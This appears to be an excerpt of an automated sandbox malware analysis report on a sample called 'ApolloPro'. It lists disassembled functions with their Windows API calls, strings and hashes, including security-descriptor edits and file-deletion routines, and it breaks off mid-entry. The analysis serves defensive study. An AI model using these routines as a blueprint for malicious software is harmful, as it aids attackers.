                                                                                              • API String ID: 641708696-742643120
                                                                                              • Opcode ID: 9743703d94c2dcff9cf19a326ea71cccc895e4db9c58751fe08a9f8d3abdc2a0
                                                                                              • Instruction ID: 71de1d66d36fa82b28e9d324e69a10313e53a1cb31c761b3cad3a3ab2ba658ea
                                                                                              • Opcode Fuzzy Hash: 9743703d94c2dcff9cf19a326ea71cccc895e4db9c58751fe08a9f8d3abdc2a0
                                                                                              • Instruction Fuzzy Hash: A9617931114A02DFDB25AF18D958B7AB7F3FB40326F10A52DE0924BA60C772A891DFD4
                                                                                              Function 0069A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0069A2C2
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0069A2E3
                                                                                              • __swprintf.LIBCMT ref: 0069A33C
                                                                                              • __swprintf.LIBCMT ref: 0069A355
                                                                                              • _wprintf.LIBCMT ref: 0069A3FC
                                                                                              • _wprintf.LIBCMT ref: 0069A41A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 311963372-3080491070
                                                                                              • Opcode ID: 77df49eec3c8fbc1fc6e8441cfc50cb3c087f4b37654c0038f4f31ecef338405
                                                                                              • Instruction ID: 3e3ba0f9ba10839aebf274f7f9c4d3d7edbfcc26fa59664bab6c640c76578443
                                                                                              • Opcode Fuzzy Hash: 77df49eec3c8fbc1fc6e8441cfc50cb3c087f4b37654c0038f4f31ecef338405
                                                                                              • Instruction Fuzzy Hash: EF51E271800219BACF54EBE0CD46EEEB7BBAF05340F100169F505B6192EB352F99DB95
                                                                                              Function 00690065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,0067F8B8,00000001,0000138C,00000001,00000001,00000001,?,006A3FF9,00000001), ref: 0069009A
                                                                                              • LoadStringW.USER32(00000000,?,0067F8B8,00000001), ref: 006900A3
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              • GetModuleHandleW.KERNEL32(00000000,006F7310,?,00000FFF,?,?,0067F8B8,00000001,0000138C,00000001,00000001,00000001,?,006A3FF9,00000001,00000001), ref: 006900C5
                                                                                              • LoadStringW.USER32(00000000,?,0067F8B8,00000001), ref: 006900C8
                                                                                              • __swprintf.LIBCMT ref: 00690118
                                                                                              • __swprintf.LIBCMT ref: 00690129
                                                                                              • _wprintf.LIBCMT ref: 006901D2
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006901E9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                              • API String ID: 984253442-2268648507
                                                                                              • Opcode ID: e17f8ed6c47d7b5f0d8ed8ce7efea14ac3211fbfcb4c85da7931932332fa28f4
                                                                                              • Instruction ID: dbc5cbcd6cea804ef9281eba4e26161cb97129ae1de1a9ecb43b5c4ee3aa575a
                                                                                              • Opcode Fuzzy Hash: e17f8ed6c47d7b5f0d8ed8ce7efea14ac3211fbfcb4c85da7931932332fa28f4
                                                                                              • Instruction Fuzzy Hash: 3B41917280021DAADF54EBE0CD96DEEB77EAF16340F100169F501B6092DB346F89CBA5
                                                                                              Function 0069A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0069AA0E
                                                                                              • GetDriveTypeW.KERNEL32 ref: 0069AA5B
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0069AAA3
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0069AADA
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0069AB08
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                              • API String ID: 2698844021-4113822522
                                                                                              • Opcode ID: 8974f10b4442e7f0d1205495349ed50e453832cb4c4e4726a69c7f806addd767
                                                                                              • Instruction ID: 37e70da361671a483a8e5f6c186dcc3d648efde856ebf24935b51ffb2f00e7a3
                                                                                              • Opcode Fuzzy Hash: 8974f10b4442e7f0d1205495349ed50e453832cb4c4e4726a69c7f806addd767
                                                                                              • Instruction Fuzzy Hash: 65519D711043059FC740EF50C98196AB7FAFF99358F10492CF8969B2A1DB31EE0ACB96
                                                                                              Function 0069A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0069A852
                                                                                              • __swprintf.LIBCMT ref: 0069A874
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0069A8B1
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0069A8D6
                                                                                              • _memset.LIBCMT ref: 0069A8F5
                                                                                              • _wcsncpy.LIBCMT ref: 0069A931
                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0069A966
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0069A971
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0069A97A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0069A984
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                              • String ID: :$\$\??\%s
                                                                                              • API String ID: 2733774712-3457252023
                                                                                              • Opcode ID: a16bbeb4213843a56e1d68e78b6fe9bbe2dd1c97d72f2324ae0ccedc0119ef71
                                                                                              • Instruction ID: 8435e0c4b9847db80492a98ddc76d81841f0a3e7d6e462ac1ad2e5b781965d2a
                                                                                              • Opcode Fuzzy Hash: a16bbeb4213843a56e1d68e78b6fe9bbe2dd1c97d72f2324ae0ccedc0119ef71
                                                                                              • Instruction Fuzzy Hash: 8731B27151021AABDB219FA4DC49FFB73BEEF89700F1041A6F908D2160E77497458B65
                                                                                              Function 006BC0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,006B982C,?,?), ref: 006BC0C8
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC0DF
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC0EA
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC0F7
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 006BC100
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC10F
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 006BC118
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC11F
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC130
                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,006C3C7C,?), ref: 006BC149
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 006BC159
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 006BC17D
                                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 006BC1A8
                                                                                              • DeleteObject.GDI32(00000000), ref: 006BC1D0
                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006BC1E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3840717409-0
                                                                                              • Opcode ID: 13b46f3d2b32ef9daa3e08fb9892ed4177698101c0adc9fac329167ec03d7ba0
                                                                                              • Instruction ID: 3f5885198bdbd8857cedc76c864ef90f09c1e004b3560cfabe568840b58d15e1
                                                                                              • Opcode Fuzzy Hash: 13b46f3d2b32ef9daa3e08fb9892ed4177698101c0adc9fac329167ec03d7ba0
                                                                                              • Instruction Fuzzy Hash: EA412BB5640205EFDB119F65DC48EBEBBBAEF89721F108058F905E7260DB319A41DB60
                                                                                              Function 006BC854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006BC8A4
                                                                                              • GetFocus.USER32 ref: 006BC8B4
                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 006BC8BF
                                                                                              • _memset.LIBCMT ref: 006BC9EA
                                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006BCA15
                                                                                              • GetMenuItemCount.USER32(?), ref: 006BCA35
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 006BCA48
                                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006BCA7C
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006BCAC4
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006BCAFC
                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 006BCB31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 1296962147-4108050209
                                                                                              • Opcode ID: 438f8925215a281a154ac61562ea242d006e8dbf6e847cf9f3dfd6311b01beca
                                                                                              • Instruction ID: 4754af6ef71830c99a5aea6e37c5e138000e195f036737763fb4447b0b88a01e
                                                                                              • Opcode Fuzzy Hash: 438f8925215a281a154ac61562ea242d006e8dbf6e847cf9f3dfd6311b01beca
                                                                                              • Instruction Fuzzy Hash: 68816EB06083059FD720DF14C985EEBBBEAFB88764F00452DF99597291C770DA45CBA2
                                                                                              Function 00688ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00688E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00688E3C
                                                                                                • Part of subcall function 00688E20: GetLastError.KERNEL32(?,00688900,?,?,?), ref: 00688E46
                                                                                                • Part of subcall function 00688E20: GetProcessHeap.KERNEL32(00000008,?,?,00688900,?,?,?), ref: 00688E55
                                                                                                • Part of subcall function 00688E20: HeapAlloc.KERNEL32(00000000,?,00688900,?,?,?), ref: 00688E5C
                                                                                                • Part of subcall function 00688E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00688E73
                                                                                                • Part of subcall function 00688EBD: GetProcessHeap.KERNEL32(00000008,00688916,00000000,00000000,?,00688916,?), ref: 00688EC9
                                                                                                • Part of subcall function 00688EBD: HeapAlloc.KERNEL32(00000000,?,00688916,?), ref: 00688ED0
                                                                                                • Part of subcall function 00688EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00688916,?), ref: 00688EE1
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00688B2E
                                                                                              • _memset.LIBCMT ref: 00688B43
                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00688B62
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00688B73
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00688BB0
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00688BCC
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00688BE9
                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00688BF8
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00688BFF
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00688C20
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00688C27
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00688C58
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00688C7E
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00688C92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3996160137-0
                                                                                              • Opcode ID: 46e898bd7006fa2e2bf88a17ced36292923e1da1ae3a426c4d86d618b5fd497f
                                                                                              • Instruction ID: fbfd9c85becc4d2f28ef46799e5567b5b630fc3153d3375b4c197682e1eabcf7
                                                                                              • Opcode Fuzzy Hash: 46e898bd7006fa2e2bf88a17ced36292923e1da1ae3a426c4d86d618b5fd497f
                                                                                              • Instruction Fuzzy Hash: 31614771A00209EFDF10AFA5DC45EEEBB7AFF04304F448269E915A7290DB359A15CB60
                                                                                              Function 006A7A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 006A7A79
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006A7A85
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 006A7A91
                                                                                              • SelectObject.GDI32(00000000,?), ref: 006A7A9E
                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 006A7AF2
                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 006A7B2E
                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 006A7B52
                                                                                              • SelectObject.GDI32(00000006,?), ref: 006A7B5A
                                                                                              • DeleteObject.GDI32(?), ref: 006A7B63
                                                                                              • DeleteDC.GDI32(00000006), ref: 006A7B6A
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 006A7B75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                              • String ID: (
                                                                                              • API String ID: 2598888154-3887548279
                                                                                              • Opcode ID: be5d5d2901d724253373e34ff9da16f92682b6ae75447a95526965fe3747690c
                                                                                              • Instruction ID: 7064f220a1d2d6ccaa7abba68db5c5b2f6cd2312110c3bd7567d99e287df9ab6
                                                                                              • Opcode Fuzzy Hash: be5d5d2901d724253373e34ff9da16f92682b6ae75447a95526965fe3747690c
                                                                                              • Instruction Fuzzy Hash: 0C514C71A04209EFDB14DFA8CC85EAEBBBAEF49310F14841DF959A7250D731AD418F60
                                                                                              Function 0069A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0069A4D4
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 0069A4F6
                                                                                              • __swprintf.LIBCMT ref: 0069A54F
                                                                                              • __swprintf.LIBCMT ref: 0069A568
                                                                                              • _wprintf.LIBCMT ref: 0069A61E
                                                                                              • _wprintf.LIBCMT ref: 0069A63C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 311963372-2391861430
                                                                                              • Opcode ID: f870ae444961094082b5456bd5bd07e02877ed2985432845b02bcd30a12bf6cf
                                                                                              • Instruction ID: 0f1879a9b642b84bdbeaad4192ac9b16bdaccdd5c6840630fb28dd0aea21eaed
                                                                                              • Opcode Fuzzy Hash: f870ae444961094082b5456bd5bd07e02877ed2985432845b02bcd30a12bf6cf
                                                                                              • Instruction Fuzzy Hash: A251B071800219BACF54EBE0CD46EEEB7BBAF05340F100169F505B61A2DB312F98DB95
                                                                                              Function 00699710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0069951A: __time64.LIBCMT ref: 00699524
                                                                                                • Part of subcall function 00644A8C: _fseek.LIBCMT ref: 00644AA4
                                                                                              • __wsplitpath.LIBCMT ref: 006997EF
                                                                                                • Part of subcall function 0065431E: __wsplitpath_helper.LIBCMT ref: 0065435E
                                                                                              • _wcscpy.LIBCMT ref: 00699802
                                                                                              • _wcscat.LIBCMT ref: 00699815
                                                                                              • __wsplitpath.LIBCMT ref: 0069983A
                                                                                              • _wcscat.LIBCMT ref: 00699850
                                                                                              • _wcscat.LIBCMT ref: 00699863
                                                                                                • Part of subcall function 00699560: _memmove.LIBCMT ref: 00699599
                                                                                                • Part of subcall function 00699560: _memmove.LIBCMT ref: 006995A8
                                                                                              • _wcscmp.LIBCMT ref: 006997AA
                                                                                                • Part of subcall function 00699CF1: _wcscmp.LIBCMT ref: 00699DE1
                                                                                                • Part of subcall function 00699CF1: _wcscmp.LIBCMT ref: 00699DF4
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00699A0D
                                                                                              • _wcsncpy.LIBCMT ref: 00699A80
                                                                                              • DeleteFileW.KERNEL32(?,?), ref: 00699AB6
                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00699ACC
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00699ADD
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00699AEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                              • String ID:
                                                                                              • API String ID: 1500180987-0
                                                                                              • Opcode ID: 384e79e018f084f03cd4fe84c18c6142e9557a47bfd18133c5742db845076f93
                                                                                              • Instruction ID: aab06f24fcb1a4c819ba67b98e55350f8cbbcfdae834206b458a720aa03a2a69
                                                                                              • Opcode Fuzzy Hash: 384e79e018f084f03cd4fe84c18c6142e9557a47bfd18133c5742db845076f93
                                                                                              • Instruction Fuzzy Hash: CDC13CB1900219AADF61DF95CC85EDEB7BEEF45314F0040AEF609E7251EB309A848F65
                                                                                              Function 00645BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00645BF1
                                                                                              • GetMenuItemCount.USER32(006F7890), ref: 00680E7B
                                                                                              • GetMenuItemCount.USER32(006F7890), ref: 00680F2B
                                                                                              • GetCursorPos.USER32(?), ref: 00680F6F
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00680F78
                                                                                              • TrackPopupMenuEx.USER32(006F7890,00000000,?,00000000,00000000,00000000), ref: 00680F8B
                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00680F97
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
